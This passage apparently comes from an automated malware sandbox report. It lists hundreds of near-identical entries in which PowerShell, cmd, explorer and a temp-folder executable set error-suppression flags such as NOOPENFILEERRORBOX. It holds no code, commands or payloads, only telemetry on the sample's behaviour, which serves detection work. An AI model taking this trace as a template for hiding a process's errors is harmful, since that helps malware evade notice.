                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
